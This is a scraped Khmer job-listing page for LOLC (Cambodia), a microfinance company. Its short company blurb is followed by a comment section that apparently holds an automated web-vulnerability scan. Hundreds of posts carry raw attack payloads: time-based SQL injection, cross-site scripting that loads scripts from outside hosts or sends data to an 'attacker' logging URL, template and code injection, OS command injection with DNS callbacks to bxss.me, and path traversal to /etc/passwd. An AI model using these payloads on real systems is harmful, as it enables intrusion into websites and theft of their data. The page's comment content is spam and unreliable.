ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

អិលអូអិលស៊ី (ខេមបូឌា) ភីអិលស៊ី
អិលអូអិលស៊ី (ខេមបូឌា) ភីអិលស៊ី គឺជាគ្រឹះស្ថានមីក្រូហិរញ្ញវត្ថុធំមួយ ក្នុងចំណោមគ្រឹះស្ថានមីក្រូហិរញ្ញវត្ថុធំជាងគេនៅក្នុងប្រទេសកម្ពុជាដែលមានទស្សនវិស័យសង្គម និងទិសដៅអាជីវកម្មដែលផ្តល់ឲ្យសហគ្រិន និងក្រុមគ្រួសារដែលស្ថិតនៅកម្រិតមូលដ្ឋានពីរ៉ាមីតនៃសេដ្ឋកិច្ចសង្គមនូវឱកាសសេដ្ឋកិច្ច ដើម្បីផ្លាស់ប្តូរជីវភាពរស់នៅ និងសហគមន៍របស់ពួកគេឲ្យប្រសើរឡើងតាមរយៈការផ្តល់ឲ្យអតិថិជននូវសេវាកម្មហិរញ្ញវត្ថុ ប្រកបដោយប្រសិទ្ធភាព

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 89

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 471 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 05:20:23


  @@LWAbz


 • pHqghUme

  2021-05-06 05:20:20


  1'"


 • pHqghUme

  2021-05-06 05:20:19


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 05:20:06


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 05:19:46


  mnx8j8FI')) OR 989=(SELECT 989 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 05:19:11


  uTpTjTGn') OR 166=(SELECT 166 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 05:18:48


  dQzLs6xy' OR 805=(SELECT 805 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 05:18:27


  -1)) OR 277=(SELECT 277 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 05:18:00


  -5) OR 369=(SELECT 369 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 05:17:40


  -5 OR 659=(SELECT 659 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 05:17:24


  ITAui6TN'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 05:16:59


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 05:16:36


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 05:16:16


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 05:15:53


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 05:15:28


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 05:15:06


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 05:14:41


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 05:14:18


  -1" OR 2+454-454-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 05:14:17


  -1' OR 2+633-633-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 05:14:17


  -1' OR 2+674-674-1=0+0+0+1 or 'YK26N85r'='


 • pHqghUme

  2021-05-06 05:14:16


  -1 OR 2+214-214-1=0+0+0+1


 • pHqghUme

  2021-05-06 05:14:15


  -1 OR 2+579-579-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 05:14:14


  hdVQGrCB


 • pHqghUme

  2021-05-06 05:13:49


  1


 • pHqghUme

  2021-05-06 05:13:28


  1


 • @@W2ccu

  2021-05-06 05:13:09


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 05:13:04


  1


 • 1'"

  2021-05-06 05:13:04


  1


 • 1OQOI7Cc')) OR 850=(SELECT 850 FROM PG_SLEEP(15))--

  2021-05-06 05:12:43


  1


 • lBIYwlBd') OR 343=(SELECT 343 FROM PG_SLEEP(15))--

  2021-05-06 05:12:27


  1


 • KQYQmc0r' OR 521=(SELECT 521 FROM PG_SLEEP(15))--

  2021-05-06 05:12:14


  1


 • ZKs5qaFD'; waitfor delay '0:0:15' --

  2021-05-06 05:12:01


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 05:11:49


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 05:11:39


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 05:11:29


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 05:11:19


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 05:11:09


  1


 • -1" OR 2+320-320-1=0+0+0+1 --

  2021-05-06 05:10:56


  1


 • -1' OR 2+825-825-1=0+0+0+1 --

  2021-05-06 05:10:55


  1


 • -1' OR 2+551-551-1=0+0+0+1 or '8Hcx3qaW'='

  2021-05-06 05:10:55


  1


 • -1 OR 2+534-534-1=0+0+0+1

  2021-05-06 05:10:54


  1


 • NfQQrtSJ

  2021-05-06 05:10:53


  1


 • -1 OR 2+860-860-1=0+0+0+1 --

  2021-05-06 05:10:53


  1


 • pHqghUme

  2021-05-06 05:10:39


  1


 • pHqghUme

  2021-05-06 05:10:25


  1


 • pHqghUme

  2021-05-06 05:10:14


  1


 • pHqghUme

  2021-05-06 05:10:11


  1


 • pHqghUme

  2021-05-06 05:10:09


  1


 • pHqghUme

  2021-05-06 05:09:56


  1


 • pHqghUme

  2021-05-06 05:09:43


  1


 • pHqghUme

  2021-05-06 05:09:29


  1


 • pHqghUme

  2021-05-06 05:09:04


  1


 • pHqghUme

  2021-05-06 05:08:40


  1


 • pHqghUme

  2021-05-06 05:08:15


  1


 • pHqghUme

  2021-05-06 05:07:53


  1


 • pHqghUme

  2021-05-06 05:07:29


  1


 • pHqghUme

  2021-05-06 05:07:06


  1


 • pHqghUme

  2021-05-06 05:06:43


  1


 • pHqghUme

  2021-05-06 05:06:42


  1


 • pHqghUme

  2021-05-06 05:06:42


  1


 • pHqghUme

  2021-05-06 05:06:41


  1


 • pHqghUme

  2021-05-06 05:06:40


  1


 • pHqghUme

  2021-05-06 05:06:39


  1


 • pHqghUme

  2021-05-06 05:06:16


  1


 • pHqghUme

  2021-05-06 05:05:47


  1


 • pHqghUme

  2021-05-06 05:05:23


  1


 • pHqghUme

  2021-05-06 05:05:18


  1


 • pHqghUme

  2021-05-06 05:05:16


  1


 • pHqghUme

  2021-05-06 05:04:59


  1


 • pHqghUme

  2021-05-06 05:04:43


  1


 • pHqghUme

  2021-05-06 05:04:27


  1


 • pHqghUme

  2021-05-06 05:04:08


  1


 • pHqghUme

  2021-05-06 05:03:45


  1


 • pHqghUme

  2021-05-06 05:03:20


  1


 • pHqghUme

  2021-05-06 05:02:55


  1


 • pHqghUme

  2021-05-06 05:02:27


  1


 • pHqghUme

  2021-05-06 05:02:05


  1


 • pHqghUme

  2021-05-06 05:01:42


  1


 • pHqghUme

  2021-05-06 05:01:42


  1


 • pHqghUme

  2021-05-06 05:01:41


  1


 • pHqghUme

  2021-05-06 05:01:40


  1


 • pHqghUme

  2021-05-06 05:01:39


  1


 • pHqghUme

  2021-05-06 05:01:39


  1


 • pHqghUme

  2021-05-06 05:01:35


  1<oACbGM<


 • pHqghUme

  2021-05-06 05:01:31


  1<img sRc='http://attacker-9836/log.php?


 • pHqghUme

  2021-05-06 05:01:26


  1<Y7lMts x=9591>


 • pHqghUme

  2021-05-06 05:01:22


  1<ifRAme sRc=9619.com></IfRamE>


 • pHqghUme

  2021-05-06 05:01:18


  1


 • pHqghUme

  2021-05-06 05:01:17


  1<WZSNID>IRUNQ[!+!]</WZSNID>


 • pHqghUme

  2021-05-06 05:01:13


  1sJ8v9 <ScRiPt >bSkB(9779)</ScRiPt>


 • pHqghUme

  2021-05-06 05:01:10


  1<% contenteditable onresize=bSkB(9511)>


 • pHqghUme

  2021-05-06 05:01:05


  1}body{acu:Expre/**/SSion(bSkB(9111))}


 • pHqghUme

  2021-05-06 05:01:00


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 05:00:55


  1


 • pHqghUme

  2021-05-06 05:00:55


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 05:00:50


  1<input autofocus onfocus=bSkB(9519)>


 • pHqghUme

  2021-05-06 05:00:45


  1&lt;ScRiPt&gt;bSkB(9144)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 05:00:41


  1\u003CScRiPt\bSkB(9028)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 05:00:38


  %31%3C%53%63%52%69%50%74%20%3E%62%53%6B%42%289850%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 05:00:34


  1<img/src=">" onerror=alert(9405)>


 • pHqghUme

  2021-05-06 05:00:28


  1<img src=xyz OnErRor=bSkB(9247)>


 • pHqghUme

  2021-05-06 05:00:23


  1<img src=//xss.bxss.me/t/dot.gif onload=bSkB(9610)>


 • pHqghUme

  2021-05-06 05:00:18


  1<body onload=bSkB(9850)>


 • pHqghUme

  2021-05-06 05:00:14


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9390'>


 • pHqghUme

  2021-05-06 05:00:09


  1<isindex type=image src=1 onerror=bSkB(9557)>


 • pHqghUme

  2021-05-06 05:00:02


  1<ScRiPt >bSkB(9828)</ScRiPt>


 • pHqghUme

  2021-05-06 04:59:56


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9217></ScRiPt>


 • pHqghUme

  2021-05-06 04:59:50


  1<ScRiPt >bSkB(9232)</ScRiPt>


 • pHqghUme

  2021-05-06 04:59:45


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%62%53%6B%42%28%39%36%33%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 04:59:40


  1<script>bSkB(9991)</script>


 • pHqghUme

  2021-05-06 04:59:36


  1<WSFRLZ>X7KXE[!+!]</WSFRLZ>


 • pHqghUme

  2021-05-06 04:59:33


  1<ScRiPt >bSkB(9761)</ScRiPt>


 • pHqghUme

  2021-05-06 04:59:30


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 04:59:27


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 04:59:23


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 04:59:18


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 04:59:15


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 04:59:11


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 04:59:08


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 04:59:01


  acux2725%C0%BEz1%C0%BCz2a%90bcxuca2725


 • pHqghUme

  2021-05-06 04:58:57


  acu9307%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9307


 • pHqghUme

  2021-05-06 04:58:51


  19759112


 • pHqghUme

  2021-05-06 04:58:44


  '"()&%<acx><ScRiPt >bSkB(9138)</ScRiPt>


 • pHqghUme

  2021-05-06 04:58:41


  1'"()&%<acx><ScRiPt >bSkB(9123)</ScRiPt>


 • pHqghUme<7HG4oF<

  2021-05-06 04:58:36


  1


 • pHqghUme<img sRc='http://attacker-9602/log.php?

  2021-05-06 04:58:31


  1


 • pHqghUme<dtKAvT x=9055>

  2021-05-06 04:58:27


  1


 • pHqghUme<ifRAme sRc=9061.com></IfRamE>

  2021-05-06 04:58:22


  1


 • pHqghUme<WLZTVJ>3RW7K[!+!]</WLZTVJ>

  2021-05-06 04:58:17


  1


 • pHqghUmeVfyfM <ScRiPt >bSkB(9550)</ScRiPt>

  2021-05-06 04:58:11


  1


 • pHqghUme<% contenteditable onresize=bSkB(9369)>

  2021-05-06 04:58:05


  1


 • pHqghUme}body{acu:Expre/**/SSion(bSkB(9707))}

  2021-05-06 04:58:00


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 04:57:53


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 04:57:47


  1


 • pHqghUme<input autofocus onfocus=bSkB(9614)>

  2021-05-06 04:57:40


  1


 • pHqghUme

  2021-05-06 04:57:34


  1


 • pHqghUme&lt;ScRiPt&gt;bSkB(9340)&lt;/sCripT&gt;

  2021-05-06 04:57:29


  1


 • pHqghUme\u003CScRiPt\bSkB(9593)\u003C/sCripT\u003E

  2021-05-06 04:57:23


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%62%53%6B%42%289820%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 04:57:15


  1


 • pHqghUme

  2021-05-06 04:57:11


  1


 • pHqghUme<img/src=">" onerror=alert(9836)>

  2021-05-06 04:57:08


  1


 • pHqghUme<img src=xyz OnErRor=bSkB(9992)>

  2021-05-06 04:57:00


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=bSkB(9422)>

  2021-05-06 04:56:52


  1


 • pHqghUme<body onload=bSkB(9539)>

  2021-05-06 04:56:45


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9892'>

  2021-05-06 04:56:38


  1


 • pHqghUme<isindex type=image src=1 onerror=bSkB(9573)>

  2021-05-06 04:56:32


  1


 • pHqghUme<ScRiPt >bSkB(9200)</ScRiPt>

  2021-05-06 04:56:24


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9011></ScRiPt>

  2021-05-06 04:56:18


  1


 • pHqghUme<ScRiPt >bSkB(9929)</ScRiPt>

  2021-05-06 04:56:11


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%62%53%6B%42%28%39%33%33%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 04:56:04


  1


 • pHqghUme<script>bSkB(9834)</script>

  2021-05-06 04:55:55


  1


 • pHqghUme<WV7QET>PAFHE[!+!]</WV7QET>

  2021-05-06 04:55:49


  1


 • pHqghUme<ScRiPt >bSkB(9199)</ScRiPt>

  2021-05-06 04:55:42


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 04:55:35


  1


 • acx__${98991*97996}__::.x

  2021-05-06 04:55:29


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 04:55:22


  1


 • acx{{98991*97996}}xca

  2021-05-06 04:55:15


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 04:55:09


  1


 • <th:t="${acx}#foreach

  2021-05-06 04:55:02


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 04:54:55


  1


 • acux10922%C0%BEz1%C0%BCz2a%90bcxuca10922

  2021-05-06 04:54:46


  1


 • acu1676%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1676

  2021-05-06 04:54:39


  1


 • pHqghUme9558575

  2021-05-06 04:54:31


  1


 • '"()&%<acx><ScRiPt >bSkB(9998)</ScRiPt>

  2021-05-06 04:54:24


  1


 • pHqghUme'"()&%<acx><ScRiPt >bSkB(9182)</ScRiPt>

  2021-05-06 04:54:18


  1


 • pHqghUme

  2021-05-06 04:54:10


  1


 • pHqghUme

  2021-05-06 04:54:04


  1


 • pHqghUme

  2021-05-06 04:53:57


  1


 • pHqghUme

  2021-05-06 04:53:50


  1


 • pHqghUme

  2021-05-06 04:53:44


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 04:53:44


  1


 • pHqghUme

  2021-05-06 04:53:43


  `(nslookup hitgnpyjnszky0827f.bxss.me||perl -e "gethostbyname('hitgnpyjnszky0827f.bxss.me')")`


 • pHqghUme

  2021-05-06 04:53:43


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 04:53:42


  |(nslookup hitiezmiaudnldafe3.bxss.me||perl -e "gethostbyname('hitiezmiaudnldafe3.bxss.me')")


 • pHqghUme

  2021-05-06 04:53:42


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 04:53:41


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 04:53:40


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 04:53:39


  1


 • pHqghUme

  2021-05-06 04:53:39


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • ${@print(md5(31337))}\

  2021-05-06 04:53:38


  1


 • '.print(md5(31337)).'

  2021-05-06 04:53:38


  1


 • ${@print(md5(31337))}

  2021-05-06 04:53:37


  1


 • pHqghUme

  2021-05-06 04:53:36


  $(nslookup hitgtnqippfht393f2.bxss.me||perl -e "gethostbyname('hitgtnqippfht393f2.bxss.me')")


 • pHqghUme

  2021-05-06 04:53:35


  (nslookup hitxhnhiyycub16a4e.bxss.me||perl -e "gethostbyname('hitxhnhiyycub16a4e.bxss.me')")


 • ";print(md5(31337));$a="

  2021-05-06 04:53:35


  1


 • pHqghUme

  2021-05-06 04:53:34


  |echo hvstus$()\ xavind\nz^xyu||a #' |echo hvstus$()\ xavind\nz^xyu||a #|" |echo hvstus$()\ xavind\nz^xyu||a #


 • pHqghUme

  2021-05-06 04:53:34


  '"


 • ';print(md5(31337));$a='

  2021-05-06 04:53:34


  1


 • pHqghUme

  2021-05-06 04:53:34


  <!--


 • pHqghUme

  2021-05-06 04:53:33


  &echo iaooqn$()\ tenxbd\nz^xyu||a #' &echo iaooqn$()\ tenxbd\nz^xyu||a #|" &echo iaooqn$()\ tenxbd\nz^xyu||a #


 • <!--

  2021-05-06 04:53:33


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 04:53:33


  1


 • pHqghUme

  2021-05-06 04:53:32


  1


 • '"

  2021-05-06 04:53:32


  1


 • pHqghUme

  2021-05-06 04:53:31


  1


 • pHqghUme

  2021-05-06 04:53:31


  1


 • pHqghUme

  2021-05-06 04:53:31


  echo qkigoa$()\ wsphdr\nz^xyu||a #' &echo qkigoa$()\ wsphdr\nz^xyu||a #|" &echo qkigoa$()\ wsphdr\nz^xyu||a #


 • pHqghUme

  2021-05-06 04:53:30


  '+'A'.concat(70-3).concat(22*4).concat(117).concat(85).concat(111).concat(88)+(require'socket' Socket.gethostbyname('hitgj'+'tuneqoik9bfd0.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 04:53:30


  1


 • pHqghUme

  2021-05-06 04:53:30


  1


 • pHqghUme

  2021-05-06 04:53:29


  1


 • pHqghUme

  2021-05-06 04:53:28


  1


 • pHqghUme

  2021-05-06 04:53:28


  "+"A".concat(70-3).concat(22*4).concat(117).concat(87).concat(121).concat(80)+(require"socket" Socket.gethostbyname("hitcz"+"khvntvmn26c34.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 04:53:28


  1


 • `(nslookup hitmwwjxkhdhue0016.bxss.me||perl -e "gethostbyname('hitmwwjxkhdhue0016.bxss.me')")`

  2021-05-06 04:53:27


  1


 • '+'A'.concat(70-3).concat(22*4).concat(100).concat(66).concat(104).concat(77)+(require'socket' Socket.gethostbyname('hittb'+'fvojiwiq0fc93.bxss.me.')[3].to_s)+'

  2021-05-06 04:53:27


  1


 • pHqghUme

  2021-05-06 04:53:27


  1


 • pHqghUme

  2021-05-06 04:53:26


  '"()


 • "+"A".concat(70-3).concat(22*4).concat(118).concat(89).concat(111).concat(77)+(require"socket" Socket.gethostbyname("hitdd"+"wjjiajto6d24b.bxss.me.")[3].to_s)+"

  2021-05-06 04:53:26


  1


 • pHqghUme

  2021-05-06 04:53:26


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 04:53:26


  1


 • pHqghUme

  2021-05-06 04:53:25


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 04:53:25


  1


 • pHqghUme

  2021-05-06 04:53:25


  1


 • pHqghUme

  2021-05-06 04:53:25


  HttP://bxss.me/t/xss.html?%00


 • |(nslookup hityoqthzfctu78ab2.bxss.me||perl -e "gethostbyname('hityoqthzfctu78ab2.bxss.me')")

  2021-05-06 04:53:25


  1


 • pHqghUme

  2021-05-06 04:53:24


  1


 • pHqghUme

  2021-05-06 04:53:24


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 04:53:24


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 04:53:23


  1


 • pHqghUme

  2021-05-06 04:53:23


  1


 • pHqghUme

  2021-05-06 04:53:23


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • /xfs.bxss.me

  2021-05-06 04:53:23


  1


 • pHqghUme

  2021-05-06 04:53:22


  1


 • pHqghUme

  2021-05-06 04:53:22


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 04:53:22


  1


 • pHqghUme

  2021-05-06 04:53:22


  1


 • pHqghUme

  2021-05-06 04:53:22


  1


 • pHqghUme

  2021-05-06 04:53:22


  1


 • pHqghUme

  2021-05-06 04:53:21


  1


 • '"()

  2021-05-06 04:53:21


  1


 • pHqghUme

  2021-05-06 04:53:21


  1


 • $(nslookup hiteqjnugjunke2909.bxss.me||perl -e "gethostbyname('hiteqjnugjunke2909.bxss.me')")

  2021-05-06 04:53:21


  1


 • pHqghUme

  2021-05-06 04:53:21


  1


 • pHqghUme

  2021-05-06 04:53:21


  1


 • pHqghUme

  2021-05-06 04:53:20


  1


 • (nslookup hitmqpcxvpfwk13109.bxss.me||perl -e "gethostbyname('hitmqpcxvpfwk13109.bxss.me')")

  2021-05-06 04:53:20


  1


 • pHqghUme

  2021-05-06 04:53:20


  1


 • pHqghUme

  2021-05-06 04:53:19


  bxss.me


 • |echo rzhbyr$()\ uhymfr\nz^xyu||a #' |echo rzhbyr$()\ uhymfr\nz^xyu||a #|" |echo rzhbyr$()\ uhymfr\nz^xyu||a #

  2021-05-06 04:53:19


  1


 • pHqghUme

  2021-05-06 04:53:19


  1


 • pHqghUme

  2021-05-06 04:53:18


  1&n910406=v910257


 • pHqghUme

  2021-05-06 04:53:18


  http://bxss.me/t/fit.txt%3F.jpg


 • &echo bcxvtu$()\ jirrct\nz^xyu||a #' &echo bcxvtu$()\ jirrct\nz^xyu||a #|" &echo bcxvtu$()\ jirrct\nz^xyu||a #

  2021-05-06 04:53:18


  1


 • pHqghUme

  2021-05-06 04:53:18


  1


 • pHqghUme

  2021-05-06 04:53:17


  Http://bxss.me/t/fit.txt


 • echo nzibyr$()\ oezzns\nz^xyu||a #' &echo nzibyr$()\ oezzns\nz^xyu||a #|" &echo nzibyr$()\ oezzns\nz^xyu||a #

  2021-05-06 04:53:17


  1


 • pHqghUme

  2021-05-06 04:53:16


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 04:53:16


  ".gethostbyname(lc("hitnc"."hwcbklri0f785.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(90).chr(106).chr(65)."


 • pHqghUme

  2021-05-06 04:53:15


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 04:53:15


  '.gethostbyname(lc('hityx'.'siohwphvb25b5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(73).chr(122).chr(67).'


 • pHqghUme

  2021-05-06 04:53:15


  1


 • pHqghUme

  2021-05-06 04:53:15


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • ".gethostbyname(lc("hitjn"."ektvvfdba00f6.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(75).chr(114).chr(87)."

  2021-05-06 04:53:14


  1


 • bxss.me

  2021-05-06 04:53:14


  1


 • pHqghUme&n918194=v921511

  2021-05-06 04:53:13


  1


 • pHqghUme

  2021-05-06 04:53:13


  1


 • '.gethostbyname(lc('hitud'.'bbiuoyfy01e3b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(79).chr(109).chr(83).'

  2021-05-06 04:53:13


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 04:53:13


  1


 • pHqghUme

  2021-05-06 04:53:13


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 04:53:12


  1


 • pHqghUme

  2021-05-06 04:53:12


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 04:53:12


  1


 • pHqghUme

  2021-05-06 04:53:12


  )


 • pHqghUme

  2021-05-06 04:53:11


  1


 • pHqghUme

  2021-05-06 04:53:11


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 04:53:11


  1


 • ^(#$!@#$)(()))******

  2021-05-06 04:53:11


  1


 • pHqghUme

  2021-05-06 04:53:10


  1


 • pHqghUme

  2021-05-06 04:53:10


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 04:53:10


  1


 • !(()&&!|*|*|

  2021-05-06 04:53:10


  1


 • pHqghUme

  2021-05-06 04:53:10


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • )

  2021-05-06 04:53:09


  1


 • pHqghUme

  2021-05-06 04:53:08


  1


 • pHqghUme

  2021-05-06 04:53:08


  1


 • pHqghUme

  2021-05-06 04:53:08


  1


 • pHqghUme

  2021-05-06 04:53:08


  1


 • pHqghUme

  2021-05-06 04:53:07


  1


 • pHqghUme

  2021-05-06 04:53:07


  1


 • pHqghUme

  2021-05-06 04:53:07


  1


 • pHqghUme

  2021-05-06 04:53:06


  1


 • pHqghUme

  2021-05-06 04:53:06


  1


 • pHqghUme

  2021-05-06 04:53:06


  1


 • pHqghUme

  2021-05-06 04:53:05


  1


 • pHqghUme

  2021-05-06 04:53:05


  1


 • pHqghUme

  2021-05-06 04:53:05


  1


 • pHqghUme

  2021-05-06 04:53:05


  1


 • pHqghUme

  2021-05-06 04:53:04


  1


 • pHqghUme

  2021-05-06 04:53:04


  1


 • pHqghUme

  2021-05-06 04:53:03


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 04:53:03


  1


 • pHqghUme

  2021-05-06 04:53:03


  ../1


 • pHqghUme

  2021-05-06 04:53:03


  1


 • pHqghUme

  2021-05-06 04:53:03


  1


 • pHqghUme

  2021-05-06 04:53:03


  1


 • pHqghUme

  2021-05-06 04:53:02


  1


 • pHqghUme

  2021-05-06 04:53:02


  1


 • pHqghUme

  2021-05-06 04:53:02


  1


 • pHqghUme

  2021-05-06 04:53:01


  1<mhf2i8<


 • pHqghUme

  2021-05-06 04:53:01


  1


 • pHqghUme

  2021-05-06 04:53:01


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 04:53:00


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 04:52:59


  1


 • ../pHqghUme

  2021-05-06 04:52:59


  1


 • pHqghUme

  2021-05-06 04:52:58


  1


 • pHqghUme

  2021-05-06 04:52:58


  1


 • pHqghUme

  2021-05-06 04:52:56


  ${9999774+10000370}


 • TEIwU21XZE8=

  2021-05-06 04:52:56


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 04:52:56


  1


 • ${9999021+10000469}

  2021-05-06 04:52:55


  1


 • pHqghUme

  2021-05-06 04:52:55


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 04:52:55


  1


 • pHqghUme

  2021-05-06 04:52:54


  1


 • pHqghUme

  2021-05-06 04:52:53


  1


 • pHqghUme

  2021-05-06 04:52:53


  1


 • pHqghUme

  2021-05-06 04:52:52


  1


 • pHqghUme

  2021-05-06 04:52:52


  1<img sRc='http://attacker-9240/log.php?


 • pHqghUme

  2021-05-06 04:52:52


  1


 • pHqghUme

  2021-05-06 04:52:52


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 04:52:52


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 04:52:51


  1


 • pHqghUme

  2021-05-06 04:52:51


  1


 • pHqghUme

  2021-05-06 04:52:50


  1


 • pHqghUme

  2021-05-06 04:52:50


  1


 • pHqghUme

  2021-05-06 04:52:50


  1


 • pHqghUme

  2021-05-06 04:52:49


  1


 • pHqghUme

  2021-05-06 04:52:49


  1


 • pHqghUme

  2021-05-06 04:52:48


  1


 • pHqghUme

  2021-05-06 04:52:48


  1


 • pHqghUme

  2021-05-06 04:52:48


  "+response.write(9086609*9593820)+"


 • pHqghUme

  2021-05-06 04:52:47


  1


 • pHqghUme

  2021-05-06 04:52:47


  '+response.write(9086609*9593820)+'


 • pHqghUme

  2021-05-06 04:52:46


  1


 • pHqghUme

  2021-05-06 04:52:46


  response.write(9086609*9593820)


 • pHqghUme

  2021-05-06 04:52:46


  1


 • pHqghUme

  2021-05-06 04:52:45


  1


 • "+response.write(9807418*9081126)+"

